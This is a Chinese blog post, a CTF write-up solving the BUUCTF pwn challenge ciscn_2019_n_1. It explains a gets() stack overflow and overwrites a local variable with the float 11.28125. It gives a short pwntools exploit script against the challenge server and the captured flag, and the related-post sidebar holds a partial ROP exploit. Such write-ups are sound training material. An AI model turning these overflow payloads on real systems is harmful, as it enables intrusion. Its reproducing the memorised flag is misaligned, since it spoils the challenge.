ctf pwn buuctf ciscn_2019_n_1

已于 2022-11-16 13:07:13 修改
阅读量184 收藏
点赞数 1
分类专栏: buuctf pwn 文章标签: python 安全架构 linux ubuntu 网络安全
于 2022-11-16 13:03:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/orange_cat__/article/details/127883114
版权

一,查保护。

NX保护,堆栈不可执行。

64位程序

二,拖进IDA分析

调用了func()函数,进去后分析。

如下图:

主要思路就是覆盖v2的地址为11.28125,利用gets函数输入v1时存在的栈溢出漏洞。

三,找payload所需条件。

v1距离v2为16×3-4=44.

11.28125的地址:

图上箭头指的为11.28125的16进制

点进去

 找到地址。

四,打开靶机,写payload。

from pwn import *



p = remote("node4.buuoj.cn", 28877)
payload=b'a'*44+p64(0x41348000)

p.sendline(payload)

p.interactive()

 五,打通获得flag。

 

flag{fb584c1a-982c-4dc9-8beb-84ec7610d6b7}

谢谢阅读。 

0rangecat
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Solyd_2019
02-11
CTF 2019 Solyd Resoluçãoda CTF de 2019 da
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 408
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
ciscn_2019_n_1 ——两种解法
qq_41696518的博客
07-13 2511
ciscn_2019_n_1 两种解法
BUUCTF PWN [HarekazeCTF2019]baby_rop
Rt1Text的博客
05-27 306
1.checksec+运行 64位/NX堆不可执行 2.IDA进行中 1.main函数 本题函数倒不是很多 很明显,格式化字符串漏洞 2.system bin/sh 3.offset 总体来看64位寄存器传参 3.EXP from pwn import* p=remote('node4.buuoj.cn',27198) shell=0x601048 system=0x400496 rdi=0x400683 payload=b'a'*(...
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2234
1.检查保护机制 (1)该文件是32位文件 (2)开启堆不可执行 2.用32位IDA打开该文件
pwn学习总结 溢出,canary绕过和格式化字符串
MrTreebook的博客
11-07 699
pwn学习总结 溢出,canary绕过和格式化字符串 目录pwn学习总结 溢出,canary绕过和格式化字符串1. checksec看一下保护2. IDA 看一下3. dgb动态调试3.1. gdb打开canary文件,断点先下在main函数上3.2. disass命令查看一下func函数的汇编代码3.3. 首先看一下canary的偏移是多少3.4. 在上面的func函数的汇编代码中可以看到canary的偏移量是多少3.5. 看一下canary的地址3.6. 看一下,计算一下溢出量4. exp 1.
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 262
BUUCTF 做题练习
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 323
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
ciscn_sshop:参赛所用的sshop平台
05-10
2018ciscn sshop 2018ciscn半决赛已经结束了,就把题目放出来好了 题目是我和队友一起出的,可能一开始没设计好,有点偏难,但也是第一次出题,也花了蛮多心血,就记录一下 题目思路 主要是借鉴了0ctf的那道条件竞争...
python迁移数据教程
2402_85292291的博客
06-13 643
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
【GO-OpenCV】go-cv快速配置
最新发布
记录我的学习历程
06-16 1356
最近对golang实现目标检测心血来潮,尝试在没有sudo权限的平台配置go-cv,有所发现,索性多个平台都做尝试。
YesPMP探索Python在生活中的应用,助力提升开发效率
YesPMP20的博客
06-13 768
Python是一种简单易学、高效强大的编程语言,正变成越来越多人选择的热门技能。学习Python不仅可以提供更多就业机会,还能让自己在职场更加有竞争力,那可以去哪里拓展自己的技能呢?
Python | Leetcode Python题解之第149题直线上最多的点数
Mopes__的博客
06-14 463
Python | Leetcode Python题解之第149题直线上最多的点数
paddleocr实验过程
mddCSDN的博客
06-11 385
切割后的数据在train_data中,注意切割后的数据前缀默认是当前目录,因此建议切割数据在liunx中进行。或者修改下面--datasetRootPath中的default。如果在Win中切割,放入liunx中训练。1、打开tmux窗口启动,这样断开连接后台可以继续训练。2、根据需求修改配置文件,如输出名称,数据集位置,注意暂时不要改吧epoch,训练容易报错。建议在liunx中指定。
深入理解Python多进程
这家伙很懒,什么都没有留下
06-12 716
本文深入介绍了Python多进程编程的基础概念、实现原理、使用方法以及实战案例。通过本文的学习,读者可以全面理解和掌握Python多进程编程的相关知识,并能够在实际项目中应用多进程技术来提高程序的执行效率。需要注意的是,虽然多进程技术能够带来性能上的提升,但也会带来一些额外的问题和复杂性,如进程间通信、进程同步等。因此,在使用多进程技术时,需要根据实际情况进行权衡和选择。
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值